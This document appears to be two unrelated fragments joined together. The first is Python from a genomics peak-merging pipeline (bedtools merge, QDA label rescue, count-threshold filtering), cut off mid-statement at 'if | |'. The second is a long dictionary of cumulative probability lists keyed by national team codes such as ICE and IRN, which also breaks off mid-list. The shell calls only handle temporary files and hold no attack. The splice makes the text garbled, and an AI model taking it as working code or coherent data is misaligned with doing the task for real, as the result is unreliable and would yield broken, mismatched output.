call('cut -f'+ str(peak_info_column) +" -d$'\t' " + mark_bed_file+'.tmp01.txt' + ' > ' + mark_bed_file+'.tmp02.txt', shell=True)
### cbind to matrix
call('paste ' + output_file + ' ' + mark_bed_file+'.tmp02.txt' + ' > ' + output_file+'.tmp.txt' + ' && mv ' + output_file+'.tmp.txt ' + output_file, shell=True)
### remove tmp files
call('rm ' + mark_bed_file+'.tmp01.txt' + ' ' + mark_bed_file+'.tmp02.txt' + ' ' + mark_bed_file+'.sort.bed', shell=True)
mark_list_vec.close()
################################################################################################
### get merged peaks
def merge_pk(peak_list, merge_pk_filename, script_folder):
import os.path
import os
cwd = os.getcwd()
print(cwd)
if os.path.isfile('all_pk.bed'):
call('rm all_pk.bed', shell=True)
### read filenames in peak list
for file_info in open(peak_list, 'r'):
filename = file_info.split('\t')[0]
call('cat ' + filename + ' >> all_pk.bed', shell=True)
### sort merge_pk
call('sort -k1,1 -k2,2n all_pk.bed > all_pk.sort.bed', shell=True)
### merge peak
outputfile_name = merge_pk_filename + '.sort.bed'
call(script_folder + 'bedtools2/bin/' + 'bedtools merge -i all_pk.sort.bed > ' + outputfile_name, shell=True)
### add pk id
call('cat ' + outputfile_name + ' | awk -F \'\t\' -v OFS=\'\t\' \'{print $1, $2, $3, $1"_"$2"_"$3}\' > ' + outputfile_name + '.tmp.txt', shell=True)
call('mv ' + outputfile_name + '.tmp.txt ' + outputfile_name, shell=True)
### rm tmp files
call('rm all_pk.bed all_pk.sort.bed', shell=True)
### return filename
return(outputfile_name)
################################################################################################
### vector most frequent element
def frequent(element_vector):
most_freq_element = Counter(element_vector).most_common(1)[0][0]
###### return output dict
return most_freq_element
################################################################################################
### column based calculation
def matrix_col_cal(matrix, function, para=None):
### get total column number
column = matrix.shape[1]
### for loop columns
col_score_list = []
for i in range(0, column):
### extract column vector
col_vec = matrix[:,i]
### calculation
if para is None:
col_vec_score = function(col_vec)
elif para.shape[1] == column:
col_vec_score = function(col_vec, para[:,i])
else:
col_vec_score = function(col_vec, para)
col_score_list.append(col_vec_score)
col_score_list = np.array(col_score_list)
###### return output dict
return col_score_list
################################################################################################
### use QDA to rescue peaks with rare pattern
def QDA_rescue(index_label_vector, signal_matrix, index_X, count_threshold):
##################
### use QDA to reassign labels
index_label_vector = np.array(index_label_vector)
index_label_vector_od = index_label_vector
change_num_array = []
for i in range(0,1):
print('QDA iteration: ' + str(i))
clf = QuadraticDiscriminantAnalysis()
clf.fit(signal_matrix, index_label_vector)
### rescued index_vector
index_label_vector_pre = index_label_vector
index_label_vector = clf.predict(signal_matrix)
### print the number of peak label changes
print('QDA changed label number: ')
change_num = np.sum(index_label_vector_pre!=index_label_vector)
print(change_num)
change_num_array.append(change_num)
if change_num == 0:
break
### get change_num_array
change_num_array = np.array(change_num_array)
change_num_array = change_num_array.reshape(change_num_array.shape[0], 1)
### generate rescued signal dict 1st
index_set_mean_signal_matrix_dict_QDA_rescue = {}
index_label_vector_QDA_rescue = []
index_uniq_vec = []
### get new index set matrix
for index, index_signal in zip(index_label_vector, signal_matrix):
if not (index in index_set_mean_signal_matrix_dict_QDA_rescue):
index_set_mean_signal_matrix_dict_QDA_rescue[ index ] = ''
index_label_vector_QDA_rescue.append(index)
index_uniq_vec.append(index)
else:
index_label_vector_QDA_rescue.append(index)
index_label_vector_QDA_rescue = np.array(index_label_vector_QDA_rescue)
print(index_uniq_vec)
print('QDA changed label number: ')
change_num = np.sum(index_label_vector_QDA_rescue!=index_label_vector)
print(change_num)
### filter by count_thresh
to_indexX = {}
for index in index_uniq_vec:
print(index)
print('OD count: '+str(np.sum(index_label_vector_od == index)))
index_new_num = np.sum(index_label_vector_QDA_rescue == index)
print('QDA rescued count: '+str(index_new_num))
if index_new_num < count_threshold:
to_indexX[index] = ''
### generate rescued signal dict 2nd
index_set_mean_signal_matrix_dict_QDA_rescue = {}
index_label_vector_QDA_rescue = []
index_uniq_vec = []
### get new index set matrix
for index, index_signal in zip(index_label_vector, signal_matrix):
if index in to_indexX:
index = index_X
if not (index in index_set_mean_signal_matrix_dict_QDA_rescue):
index_set_mean_signal_matrix_dict_QDA_rescue[ index ] = [ index_signal ]
index_label_vector_QDA_rescue.append(index)
index_uniq_vec.append(index)
else:
index_set_mean_signal_matrix_dict_QDA_rescue[ index ].append(index_signal)
index_label_vector_QDA_rescue.append(index)
### return index_label_vector_QDA_rescue & index_set_mean_signal_matrix_dict_QDA_rescue
return { 'index_label_vector_QDA_rescue': index_label_vector_QDA_rescue, 'index_set_mean_signal_matrix_dict_QDA_rescue':index_set_mean_signal_matrix_dict_QDA_rescue, 'change_num_array': change_num_array }
################################################################################################
### get pass count threshold index dict
def pass_count_thresh(index_matrix, count_threshold):
##################
###### extract index_set pass count threshold
index_vector = []
for index_array in index_matrix:
index_label = ''
for i in range(0,len(index_array)-1):
index_label = index_label + index_array[i] + '_'
index_label = index_label + index_array[len(index_array)-1]
### append to index vector
index_vector.append(index_label)
### index_vector 2 np array
index_vector = np.array(index_vector)
#print(index_vector)
### index peak counts (dict)
index_uniq_count_dict = Counter(index_vector)
#print(index_uniq_count_dict)
### get index dict of index pass the count threshold
pass_thresh_index_dict = {}
for index in index_uniq_count_dict:
if index_uniq_count_dict[ index ] >= count_threshold:
pass_thresh_index_dict[ index ] = index_uniq_count_dict[ index ]
### return pass_thresh_index_dict
return { 'pass_thresh_index_dict': pass_thresh_index_dict, 'index_vector':index_vector }
################################################################################################
### get index_set signal matrix
def get_index_set_mean_signal_matrix(signal_matrix_file, pass_thresh_index_dict, count_threshold, index_vector, log2_sig='F', scale='F', smallnum=0.0):
##################
###### get index_set signal matrix
### read signal matrix
signal_matrix_od = read2d_array(signal_matrix_file, 'str')
### bed info
bed_info = signal_matrix_od[:, 3].reshape(signal_matrix_od.shape[0], 1)
### signal matrix
signal_matrix = signal_matrix_od[:, (5-1):].astype(float)
### adjust signal
if log2_sig == 'T':
signal_matrix = np.log2(signal_matrix+smallnum)
if scale == 'T':
signal_matrix_mean = np.mean(signal_matrix, axis=0)
signal_matrix_std = np.std(signal_matrix, axis=0)
signal_matrix = (signal_matrix - signal_matrix_mean) / signal_matrix_std
### get index set mean signal matrix
index_set_mean_signal_matrix_dict = {}
index_set_vector = []
index_label_vector = []
### get index_X
index_vec = index_vector[0].split('_')
index_X = ''
for i in range(0, len(index_vec)-1):
index_X = index_X + 'X_'
index_X = index_X + 'X'
for index, index_signal in zip(index_vector, signal_matrix):
### if the index_set is not in pass_thresh_index_dict, replace index by X_
if not (index in pass_thresh_index_dict):
index = index_X
### append to index_label_vector for function matrix analysis
index_label_vector.append(index)
### get index set mean signal
if | |
1.0],
'PAN': [0.12267005290619887,
0.1566068190578219,
0.16545763116614304,
0.1670303557942864,
0.16724181608188166,
0.2612863303461708,
0.31254617932251366,
0.32651601125600277,
0.3290541407816412,
0.45883812725218426,
0.5295781124397512,
0.5488568603054327,
0.6831859326279057,
0.7564032597016747,
0.8490921456047215,
0.88107044122387,
0.9315913921835774,
0.9515452893226796,
0.9550479770721235,
0.9553938349278008,
0.955416681942071,
0.972846753401123,
0.9866152136701511,
0.991365426043661,
0.9949907792849477,
0.997492322302629,
0.9983553716460756,
0.998832664889739,
0.99932667312905,
0.9996675455294693,
0.9997851488244364,
0.9998249137637559,
0.9998805292448991,
0.9999393861793082,
0.9999818243326782,
1.0],
'POL': [0.04636787622657069,
0.07322640975485294,
0.0868145416268734,
0.09156259137795,
0.09282517191502755,
0.13452726723014896,
0.17987606996574176,
0.20453327116884298,
0.21347106789841405,
0.28357134546809337,
0.3598016556046916,
0.4012498522808444,
0.48962758626902514,
0.5857336546707114,
0.6600141391012418,
0.6912300920242493,
0.7720061539964388,
0.8242612637781901,
0.8392854976175175,
0.8417153418358796,
0.8419859180248294,
0.8759316006245167,
0.9198514285426905,
0.9383084875022685,
0.95725003506331,
0.9731701912520426,
0.9798605467326829,
0.983945059821801,
0.9890945403057051,
0.9934226203282267,
0.9952414714472767,
0.9958184622746353,
0.9968100585765992,
0.9981069069728309,
0.9992783510788118,
1.0],
'SEN': [0.0477748537125971,
0.0675648828905204,
0.07426913873305409,
0.07581661277489153,
0.07608688884624352,
0.13085040149089144,
0.16962529831316336,
0.18335243661173975,
0.18659223592024504,
0.2846426333331677,
0.35406648617728215,
0.3786440068752556,
0.5103085034792496,
0.603532568635618,
0.7214007950673614,
0.774159584112636,
0.8576153030357667,
0.8906186051727802,
0.896419248601158,
0.8969927275374313,
0.8970306606771103,
0.9343861279016633,
0.9639312276788703,
0.9771558577056055,
0.9849451050429749,
0.9919181675812785,
0.9950393678113584,
0.9960661433941155,
0.9974449230196549,
0.9986792292547774,
0.9992317148927435,
0.9993173723190969,
0.9994728035264999,
0.9996862174996234,
0.9998858706330278,
1.0],
'SWE': [0.02262762016201463,
0.03648302283504838,
0.04308381361627122,
0.04523667215147092,
0.045769036761781796,
0.07622200433084009,
0.10684259200595456,
0.122237157206261,
0.127396924010238,
0.190759725546845,
0.2544712904507493,
0.28650241442306346,
0.38538057652983443,
0.4848029866801297,
0.587669765552635,
0.6411779111843199,
0.7446108923602676,
0.794595719290099,
0.8053315294942827,
0.8066285713297461,
0.8067344643454383,
0.8605371310619833,
0.9125382810552366,
0.9395876855116817,
0.9563410037989659,
0.9737701292086578,
0.9828362260659393,
0.9855349517063479,
0.9897463348030984,
0.9941275996297346,
0.9964065993122773,
0.9966850432959831,
0.9972739856874612,
0.9982184421683294,
0.9992553348199812,
1.0],
'TUN': [0.0672206801431712,
0.09308394977646217,
0.10166787574228821,
0.10361258020116958,
0.10394620871344373,
0.1691523042838444,
0.2145544165562554,
0.23036085137469234,
0.2340294528143558,
0.3398321572194835,
0.4135011328283665,
0.4391484827603742,
0.567904224399815,
0.6575550858184371,
0.7620139217138695,
0.8043873656383557,
0.8771206239891691,
0.9083319581431367,
0.9142845911033769,
0.9149231903516117,
0.9149692019265947,
0.9444732512274937,
0.9697948375967972,
0.9800664705410201,
0.9873104788658769,
0.993187503588785,
0.9955715027536642,
0.9966076869769839,
0.9978686629501287,
0.9988916859281305,
0.9993066724289873,
0.9994009046879431,
0.9995560456558896,
0.9997494629456364,
0.9999140627069308,
1.0]},
'ICE': {'BEL': [0.0005580634313936833,
0.0014881076887115349,
0.002529922179740882,
0.003334743876796435,
0.0038075897586962817,
0.005331794987597011,
0.008990274685801073,
0.0133809149514247,
0.016893798905485164,
0.0228058932556891,
0.036996421370913565,
0.054026857309577965,
0.07122575166266391,
0.11250746663729434,
0.14586304245039108,
0.17820798320594644,
0.2582698374892636,
0.30781313824629297,
0.32143892891012715,
0.323546882351106,
0.32377069489225935,
0.40140676833569927,
0.49749116134993016,
0.5906643092815733,
0.6303031445610654,
0.707178794132732,
0.7817252011524566,
0.7899015407900604,
0.813687359028439,
0.8598176303841916,
0.9045502083016042,
0.9056507708528341,
0.9100108052538185,
0.9231471867942521,
0.9504422494395348,
1.0],
'BRA': [5.3763711643584387e-05,
0.00016469904072047222,
0.00030401987099919236,
0.0004234510255874322,
0.0005009787566447038,
0.0007809743983319639,
0.001518645683627237,
0.0024903731752947255,
0.003343738205568723,
0.005064416216703196,
0.009597682350433288,
0.015569311471698941,
0.02349996924951356,
0.04439393203030519,
0.06876236214208559,
0.10620064297257928,
0.17040125357087987,
0.19792467551869977,
0.20316892301560782,
0.20373098790607796,
0.20377144445777834,
0.30240563952258054,
0.38697650400354827,
0.516906407571094,
0.5410773052817687,
0.6153469116754865,
0.7294505436527497,
0.7329046427667028,
0.7488246916231143,
0.79774202090428,
0.8728958450408898,
0.8732096479946688,
0.8751663177733119,
0.8844051251748248,
0.9141813536966016,
1.0],
'COL': [0.00027853399173343867,
0.0006864126891924681,
0.001056696854023703,
0.0012855573003736718,
0.001392555921787561,
0.0025690436067687334,
0.004797774426659023,
0.006908821202133057,
0.00824187241629409,
0.014088052139563306,
0.025163017984255766,
0.03565319056421489,
0.05744123250022822,
0.0987163611630769,
0.15285071828475746,
0.22010156692879734,
0.32265335023451636,
0.3617490214090513,
0.3683731935765928,
0.369004524521111,
0.3690447167350915,
0.49644429851579425,
0.5935810229396559,
0.7142535034001415,
0.7389410340286147,
0.8002794325602048,
0.8764798268207973,
0.8796170242718474,
0.8913089996917907,
0.9203587681243978,
0.956447154204506,
0.9566989643366296,
0.9579665017234884,
0.962792867090993,
0.9753044165918181,
1.0],
'CRC': [0.0028869659458609044,
0.005224146863056542,
0.006465047606789008,
0.006912169826482188,
0.007033876661488001,
0.015154328525974363,
0.024092781556544648,
0.02901220869637689,
0.030817201372503232,
0.05850687144451268,
0.088985817628907,
0.10576041548607444,
0.17657400826622527,
0.25452089885238666,
0.3752534057016243,
0.4781738877576277,
0.6110681970576405,
0.653967572117693,
0.6601223591318136,
0.6606190630876192,
0.6606456624133202,
0.7739336801361398,
0.8470742861966981,
0.9094242417312162,
0.9251645008290331,
0.9520006048131348,
0.9748774987883234,
0.9765711937808237,
0.9809026512225625,
0.9882875005815754,
0.9945828412133216,
0.9946970434811362,
0.9950907256743687,
0.9961159439118659,
0.9979278319985511,
1.0],
'CRO': [0.0008307658256729814,
0.0018721703783717433,
0.0027136117556318703,
0.003177400894324847,
0.00337092981827338,
0.00607963269190489,
0.010665192817520885,
0.014546637672609084,
0.016736935586115248,
0.027718110883900186,
0.04630813050846391,
0.062043642430916035,
0.09543219127136558,
0.15195562900437976,
0.21963479590836651,
0.2882282177834218,
0.40280220524840893,
0.45064643813832983,
0.4595259817666561,
0.46045297000087393,
0.4605178794850142,
0.5766396081883592,
0.6736206970827446,
0.7719118707000568,
0.7989103538382941,
0.8536367468660012,
0.9091024202241711,
0.9128604626429332,
0.9242868882704915,
0.9474484509625076,
0.9709228953697927,
0.9712549460469957,
0.972620275788367,
0.9768703775594018,
0.9858955067146884,
1.0],
'ENG': [0.00016697945716484102,
0.00043101289650603953,
0.0006863002555530142,
0.0008542571459800696,
0.0009378254673505036,
0.0017221992692116183,
0.0033030213778355733,
0.004896010927706317,
0.005966178022896333,
0.010222717314815291,
0.018801320275452508,
0.027445951947943924,
0.044770083663581595,
0.0796850315670082,
0.12669122119944076,
0.19046301363408621,
0.28519899746833066,
0.32038268248957213,
0.32619012822371923,
0.3267293302597843,
0.3267627338392515,
0.4552880098595178,
0.5507531677804425,
0.6802676909374812,
0.7039040179933101,
0.7680373142552864,
0.8550449038801748,
0.8579709764330159,
0.8698801032702024,
0.9021935654196602,
0.9460322049084946,
0.9462606991058476,
0.9475163381723045,
0.9527346472842514,
0.9674914720695919,
1.0],
'GER': [0.000145125626530287,
0.00042855636893464897,
0.000780804134223934,
0.001081271340978072,
0.0012757995181689472,
0.001834566419940662,
0.003307941289654018,
0.005250462849019533,
0.006957831008187298,
0.009736623187436167,
0.017063833428557405,
0.026724147416504564,
0.03708851306384027,
0.06441761190073554,
0.09018901864688766,
0.12222983176922025,
0.1901847212527333,
0.22621585275901987,
0.23470673021212335,
0.2358322412844015,
0.23593360148678785,
0.3204198670654061,
0.4100127063349572,
0.5214007826014369,
0.5530701385352336,
0.6318172496397464,
0.7297211590256774,
0.7353184149751401,
0.7561951137492235,
0.808105854254804,
0.8726449130638284,
0.8732826337518202,
0.87651181972232,
0.8889224035550414,
0.9216594058619425,
1.0],
'JPN': [0.005185959849876952,
0.010522688838681488,
0.014512924390978376,
0.016567428431117873,
0.017371429887734505,
0.02660647549135324,
0.04135717812778874,
0.053137478821879774,
0.059409518324613435,
0.08434555390884635,
0.12417470707409568,
0.15598332068675727,
0.20648165312713623,
0.28714025704047363,
0.3553168675698406,
0.4013386864958489,
0.5102339699457441,
0.5746500612387563,
0.591585527173499,
0.5940900353697701,
0.5943434397874011,
0.6678519198645779,
0.7548185691711243,
0.8135243827325589,
0.8478206438971085,
0.8941232191908484,
0.9253792279514843,
0.9321417831335341,
0.9458367331016633,
0.964325962846005,
0.976806899882453,
0.9776737796612631,
0.9800622017202301,
0.9850637520652437,
0.9922762100593607,
1.0],
'KOR': [0.004829563245440245,
0.00910075250199371,
0.01172812796616558,
0.012832264638376018,
0.013183757152892692,
0.023526709015185776,
0.036897148312436505,
0.045539199894113015,
0.04926308928323302,
0.07934599044618645,
0.11823446341209369,
0.14337022610712408,
0.20899324319371249,
0.2938247862716049,
0.3892584092505374,
0.4586515642685986,
0.5820195814405983,
0.636850881649493,
0.6476819671970411,
0.6488854446396951,
0.6489754109905043,
0.7386806498011199,
0.8184201964403091,
0.8764016347246409,
0.9000286282816437,
0.9343886698547014,
0.9593730686114433,
0.9628734322833651,
0.970509146133154,
0.9816135401258022,
0.9896879368599968,
0.9900183311064965,
0.9909938947906953,
0.9931759780919359,
0.9965103527504868,
1.0],
'MEX': [0.0012074134112653285,
0.0026578706704200534,
0.0038020964034702104,
0.004418668731703967,
0.004670333936535536,
0.008206661439548204,
0.014067507702898736,
0.018924173112616408,
0.021607198491783393,
0.034871972682623036,
0.05685602313732219,
0.07507338844793998,
0.11239054180493238,
0.1742372170986895,
0.2442255895420978,
0.30985723392849074,
0.42585075849981086,
0.47710079904148445,
0.487164834618682,
0.4882764963111136,
0.48835908490080737,
0.5971320923306462,
0.6932516138508567,
0.7833877612531364,
0.8117004301023253,
0.8648008794674593,
0.9145958623742003,
0.918765708440253,
0.9304965364877743,
0.9524977206243362,
0.9731293461775373,
0.9735204737354344,
0.9750097474142219,
0.979305086332093,
0.9877673373612493,
1.0],
'NGA': [0.0027724151275457256,
0.00529691522671852,
0.006826847585298671,
0.007458017776588031,
0.007654974223305383,
0.014986156616037844,
0.024255020831296187,
0.030114365152483898,
0.032583701565728415,
0.057043197984834114,
0.08796750718044656,
0.10751641535990625,
0.16872076136717368,
0.24610183608813835,
0.3482018386390573,
0.43336254372738353,
0.5624482776957719,
0.6113649896255139,
0.6196035958859714,
0.6203840956297387,
0.620433474244984,
0.728102738171884,
0.8097047278772581,
0.8777682225520435,
0.8983834674263741,
0.932773452640938,
0.9614578337935126,
0.9640618654032995,
0.9705778642991221,
0.9814477378830382,
0.9905142028732385,
0.9907219027274392,
0.9914238079311744,
0.9932180052506617,
0.9963400516738412,
1.0],
'PAN': [0.011058482114528978,
0.01828370560151173,
0.021672611058985682,
0.02275525904541624,
0.023016935600445147,
0.04337731264884211,
0.06332279770516369,
0.07309232145185848,
0.07628247013188047,
0.12753396247828988,
0.17774108154487775,
0.20233309525570511,
0.2990914507673802,
0.39387812045159,
0.5156590212956689,
0.5922962674123923,
0.7115955874670863,
0.7580231683323863,
0.7660534656235126,
0.7668347510421665,
0.7668855714423573,
0.8419611480657823,
0.900395301807733,
0.9371681667718212,
0.9523286689267147,
0.9714098077070111,
0.9834176506344109,
0.9853843157683283,
0.9890972083200967,
0.99377028691161,
0.9967110754232595,
0.9968723939725678,
0.9972838526832716,
0.9980778479908444,
0.9991214364358969,
1.0],
'POL': [0.002282444057607147,
0.005215992168585845,
0.0078861989326174,
0.009564049872692167,
0.01036620134737958,
0.015003853681955243,
0.02406787814126838,
0.03292543509810569,
0.038695963454157246,
0.05291575095882023,
0.08070750688402895,
0.10786620025947813,
0.1405663158713579,
0.20447680901434276,
0.2546087143225691,
0.2930368342665846,
0.3910167566764671,
0.4534714461683848,
0.4711648136510928,
0.4739843550046167,
0.47429338322618425,
0.5493989310269867,
0.6451469894383164,
0.7185417237979022,
0.7592297553214601,
0.8216077777030109,
0.8694230384877505,
0.878068205485028,
0.8979488092002577,
0.9284273724797155,
0.9517904159990705,
0.9529921661730408,
0.9567580679668873,
0.965736868299134,
0.9805151671534804,
1.0],
'SEN': [0.003016019405460403,
0.005758593538261563,
0.007429523996526198,
0.008122933207176554,
0.00834064169093372,
0.01605812761891024,
0.025879001449896407,
0.03212776974725807,
0.034778389634795535,
0.059982244194569025,
0.0920553672292047,
0.11246266681021228,
0.174195946008763,
0.2527545273706303,
0.3535591550005844,
0.43586138390803725,
0.5641401444749365,
0.6141249402423872,
0.6227813652442857,
0.6236246257222557,
0.6236795493548154,
0.728413113322708,
0.8100335746024553,
0.8766728355740574,
0.8978755250371381,
0.9324975189410285,
0.9607647456994131,
0.9635186754948294,
0.9702640372628258,
0.9812785773954709,
0.9902714304481606,
0.9904976242841582,
0.991246139152452,
0.9931201608442229,
0.9963159640361642,
1.0],
'SRB': [0.0023084713426866723,
0.004877256022381828,
0.006825439337040004,
0.007837355222194822,
0.008235924751439899,
0.013785290752542619,
0.02267528743834761,
0.02979610457835236,
0.03359858344184093,
0.051724218149034606,
0.08076119866952002,
0.1040195907580581,
0.14842177563917877,
0.21955337452042484,
0.29206776474054585,
0.35128035532673324,
0.4674472631504286,
0.5244231121198992,
0.5368429710457159,
0.5383658488162367,
0.5384921374472588,
0.6333497723490714,
0.7263985481324354,
0.8023787645871479,
0.832803567973629,
0.8824911243640313,
0.9230641599345162,
0.9280382643937795,
0.9402232780159814,
0.9601229481561673,
0.9763722886971852,
0.9768936660786035,
0.9786252382567265,
0.9829861178728252,
0.9905078882928375,
1.0],
'SWE': [0.0010116793721119195,
0.0023270230789514,
0.003454153858868582,
0.004115128836221008,
0.004408961543223965,
0.0073501013638262985,
0.012665238865735444,
0.017467915444779457,
0.02036099862022103,
0.03152329319368324,
0.051695448927039554,
0.06992269890027548,
0.10169528395521521,
0.15911372328786924,
0.2194058167237718,
0.2766113686893721,
0.3855693871572422,
0.43745180669749784,
0.44843171537222126,
0.4497387881246128,
0.4498438497919785,
0.5532239653648264,
0.6516767567002759,
0.7450894406848841,
0.7763428787631553,
0.8356498317715432,
0.8919206757396592,
0.8968813141251379,
0.9110013773426182,
0.937795803082831,
0.9632185380837259,
0.963722359687488,
0.9656656528307558,
0.9713476924715273,
0.9827173098762607,
1.0],
'SWI': [0.0009212364795856628,
0.002068627474122782,
0.0029953042271212106,
0.003506137435222798,
0.003719372665458902,
0.006622347489264597,
0.011540270627244234,
0.015705991906109565,
0.018058371597877917,
0.029554074077455566,
0.04902891786460532,
0.06552506245462358,
0.09966706768713583,
0.15750696217505036,
0.22510767489749262,
0.292031927434225,
0.406554143236902,
0.45554736099886467,
0.4648627215158801,
0.46585901180580885,
0.46593056460694626,
0.5793067907262326,
0.6763127051919894,
0.7723479103815897,
0.8000143438231034,
0.8547935111976473,
0.9090245197696746,
0.9129698026093304,
0.924687213319512,
0.9478875294660154,
0.9708556869630467,
0.971213313454044,
0.9726501936731058,
0.9770217938449643,
0.9860998805224973,
1.0],
'TUN': [0.004640571949823155,
0.008655477930605338,
0.011052089760050792,
0.012028284137641123,
0.01232934546927314,
0.022624354712242195,
0.03550772634076511,
0.043568975272230866,
0.04693164234462922,
0.07740135584418056,
0.11553173855339785,
0.1393902839508265,
0.2070252480509403,
0.2916649367601726,
0.39175314115349663,
0.46580987195808193,
0.5910621667737852,
0.6440220300642552,
0.653974376863781,
0.6550264033489999,
0.655101037347134,
0.7477770478325593,
0.8261486074568533,
0.8841368741962952,
0.9062285364138518,
0.93892042636808,
0.9631096353613715,
0.9662232746833032,
0.9731347569249281,
0.9833625711400231,
0.9909302809279822,
0.9912090466756166,
0.9920460075687052,
0.9939486229122694,
0.9968999212133614,
1.0]},
'IRN': {'ARG': [0.0002605336366434878,
0.0005110729068353581,
0.0006524039167146722,
0.0007061408448710916,
0.0007215327340697461,
0.002199549306809154,
0.003904263583405004,
0.004887354983876761,
0.005265314197707195,
0.013862989168959646,
0.023779372746350697,
0.029498050387849518,
0.0670077862094995,
0.11027075317880114,
0.2193684868579188,
0.3780248361123152,
0.5038559448950406,
0.5288052583197781,
0.5310038605092523,
0.5311128431282012,
0.5311163779304956,
0.7141073867155054,
0.7866729084891297,
0.8922019637507724,
0.9017939741000621,
0.929692506777281,
0.9702641959852416,
0.970898151755779,
0.9736639592043015,
0.9817083593531414,
0.9934069997970423,
0.9934328168075025,
0.9935839990842311,
0.994250927972267,
0.996233969903671,
1.0],
'AUS': [0.005589535276345608,
0.008595206659637703,
0.009658726150883973,
0.009912840991678147,
0.009958615870897022,
0.024939867914240386,
0.0358190301730776,
0.039769173028684185,
0.04072535134514262,
0.08761336187833457,
0.1216627372649078,
0.13402581207904465,
0.24408765097275567,
0.3240129202604266,
0.4962475454579849,
0.6310116308808682,
0.7560858522271965,
0.7851061227174786,
0.7880987496917796,
0.7882723403072877,
0.7882789540002141,
0.8861426270588887,
0.9315561460520836,
0.9670897174575587,
0.9741144136254914,
0.9851072874841507,
0.9937086043798216,
0.9942519046717364,
0.9955272121228238,
0.997522927468465,
0.9990844645462232,
0.9991104738217045,
0.9991925150444508,
0.9993876111482289,
0.99970090053786,
1.0],
'BEL': [0.0005929627434920155,
0.0011959210115785352,
0.0015711035208607,
0.001729087593196749,
0.0017792847216860136,
0.004316854458772217,
0.007571562952403124,
0.009658821328733875,
0.010551199768172889,
0.022552755006190094,
0.03794605167074128,
0.0478178381810549,
0.09038927750726168,
0.14499176710039455,
0.2456635778428342,
0.3646965919782361,
0.49381911133364914,
0.5288359197497653,
0.5330564654859549,
0.533342608527063,
0.5333554069572799,
0.6860281617064126,
0.7688349816182168,
0.8667446674813942,
0.8817156194262324,
0.9171185295622097,
0.9589784610720504,
0.9603317880224959,
0.965132255546647,
0.9764842738414357,
0.989906749747884,
0.9899828756646667,
0.9903462218690381,
0.9916548117834929,
0.9948441597283806,
1.0],
'BRA': [6.42165574010734e-05,
0.00014191152757329827,
0.00019547068012470067,
0.0002203420302883659,
0.00022904059333381049,
0.0007144486187331413,
0.0013978179246465021,
0.0018788499470160597,
0.0021045861675756286,
0.005741867743888602,
0.010862521824899335,
0.01446701293553142,
0.03490829620619113,
0.06368603540643861,
0.14027181391246824,
0.28374082688274216,
0.3915601614671754,
0.4118171644770148,
0.41350866143047443,
0.4135881106753836,
0.4135905496027252,
0.6155697396519918,
0.6914650895263476,
0.8336407146608512,
0.8431468163061839,
0.8787625937221855,
0.9454820360484184,
0.9460773687574777,
0.9494230994332162,
0.9619582903544597,
0.985440606574868,
0.9854635472402602,
0.9856365353893229,
0.9866189825039391,
0.9903775892076879,
1.0],
'COL': [0.000245293704821089,
0.00045534886387930913,
0.0005597100825224968,
0.0005945977080069224,
0.0006033774894959066,
0.0020895260417967453,
0.0035939469645984504,
0.004355405941717371,
0.004612346343191,
0.013617033571598882,
0.02273243448406422,
0.027346172401181472,
0.06826623652730032,
0.10968941763420423,
0.23365830965769396,
0.4214425484869052,
0.5469356525564432,
0.5679018945413883,
0.569458715996437,
0.5695237408748873,
0.5695255117886591,
0.7596185798266317,
0.8231366080672322,
0.9193517503533593,
0.9264264251485633,
0.947859421760808,
0.9803254613370659,
0.9807194520263574,
0.9825098667139477,
0.9879339961678772,
0.9961502995016546,
0.9961637623597369,
0.9962457934591913,
0.9966220636581169,
0.9977833721295851,
1.0],
'CRC': [0.0018926839906155959,
0.0027914047293649976,
0.0030515886351875523,
0.0031022000773212586,
0.00310960717654164,
0.010683642962744207,
0.015138629824431706,
0.01644882352420025,
0.0167057053189482,
0.04819671391276046,
0.06671947159530112,
0.07216694005513213,
0.17036593695537908,
0.22812579621276857,
0.4322696333017576,
0.6444648060475129,
0.7645405672133969,
0.781527509273622,
0.782595561634919,
0.7826333355857199,
0.7826342041940891,
0.9074456961622058,
0.9427594940832309,
0.9794660513666337,
0.9827965788790778,
0.989720342740041,
0.9969171765483889,
0.9970742314980711,
0.997563978864246,
0.9985821044020936,
0.9996403843259997,
0.9996449129520804,
0.9996638313917643,
0.9997232928194361,
0.9998488663104869,
1.0],
'CRO': [0.0006757056748622503,
0.0011767159392099477,
0.0013987617923461935,
0.0014650363504629563,
0.0014799329123505972,
0.004698720127332972,
0.007610511133076589,
0.00892754862186502,
0.009324689704095307,
0.025235831883733136,
0.03962942723359872,
0.04613982054027172,
0.10512891221172176,
0.15849183902043107,
0.3042895823852823,
0.4844668098011364,
0.6163588950596561,
0.6404955775962501,
0.6424587294925074,
0.6425485452953249,
0.6425512294317102,
0.805543808682457,
0.8652001577876325,
0.9389236279282142,
0.9462018324634925,
0.9641906803491604,
0.9864213449784085,
0.9868653233818132,
0.9885113323510565,
0.9925796166130113,
0.9976072128003148,
0.9976238662065199,
0.9977066949171841,
0.998016932035152,
0.9987994868070579,
1.0],
'DEN': [0.0010576453644712538,
0.0017888779367911342,
0.002095795488418447,
0.0021825850684896227,
0.0022010700158642234,
0.006711069421501986,
0.010577953159116959,
0.012235690610427846,
0.012709473229533893,
0.03304351499356764,
0.05047796860325866,
0.05795213867224377,
0.12671155812104745,
0.18566604058551384,
0.34067236996494943,
0.5153899747694503,
0.6482927537710294,
0.6735666073791224,
0.6757027308455541,
0.6758042864190813,
0.6758074427552252,
0.8256107140924691,
0.8825862864354068,
0.9468071190425452,
0.9540304055454086,
0.9703140672726365,
0.9886684298707189,
0.9891263091491261,
0.9906746247140428,
0.9941650368548475,
0.9980993049035357,
0.9981171693713823,
0.9981982302520365,
0.9984752669619861,
0.9991131528432661,
1.0],
'ENG': [0.00015454077137017606,
0.00029691779585849077,
0.0003722089517857752,
0.00039899268631024933,
0.00040616462190171706,
0.0014416811710896715,
0.0025568840300549955,
0.0031573946726032535,
0.0033729686248605713,
0.010224887996416146,
0.01760408447430042,
0.021577609096121643,
0.055581507279435574,
0.092202114163734,
0.20470247393749275,
0.3908036509407175,
0.5119612731464735,
0.5316806129901683,
0.5331070463394306,
0.533165087103739,
0.5331666262573457,
0.7335888839349842,
0.798829428267789,
0.9067521239203418,
0.913831059287701,
0.9372513969016363,
0.9759939609657108,
0.9763780114549252,
0.9782839319750511,
0.9845895838464471,
0.9950205659108537,
0.9950333428968656,
0.9951183499985203,
0.9955440661042995,
0.9969782606519249,
1.0],
'FRA': [0.00020643991773184646,
0.0004135839199033913,
0.0005348712085793011,
0.0005827350080104786,
0.0005969639527317058,
0.00182581606145087,
0.0032967837261747937,
